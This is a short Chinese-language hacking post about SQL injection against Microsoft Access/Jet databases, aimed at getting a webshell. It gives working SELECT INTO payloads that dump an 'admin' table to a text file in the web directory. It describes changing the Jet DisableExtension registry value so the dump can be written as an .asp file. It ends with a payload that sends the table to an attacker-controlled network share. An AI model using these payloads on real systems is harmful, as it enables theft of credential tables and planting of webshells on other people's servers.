已經聽N個人過說有人已經發現SQL注入Access得到webshell的技術了,也只是聽說而已,具體的細節還是不得而知。
最近在看的書中一章提到Jet的安全,然後靈光一閃,呵呵,發現了一種可以利用access導出asp的方法,分享之。
幾個月之前網上就流傳利用SQL注入Access導出數據庫內容到文本文件(可導出txt、htm、html等格式)的方法:
SELECT * into [test.txt] in 'd:web' 'text;' from admin
執行上述語句,在d:web目錄下就會生成test.txt文件,其內容就是表admin的內容。但是導出asp格式就不行,會說“不能更新,數據庫或對象為只讀”。
其實控制導出文件後綴是存儲在注冊表的,具體鍵值是HKEY_LOCALMACHINESoftwareMicrosoftJet4.0EnginesTextDisableExtension,默認情況下值為“!txt,csv,tab,asc,tmp,htm,html”,如果我們把asp也添加進去的話,呵呵,就可以導出asp格式的文件了。
這個方法跟那個調用Access的Shell函數執行命令一樣,要修改注冊表,所以利用不是很大。
順便提一下,前面提到的導出文本文件的方法如果不知道web路徑貌似可以導出到自己機器的哦:SELECT * into [test.txt] in '\youripshare' 'text;' from admin
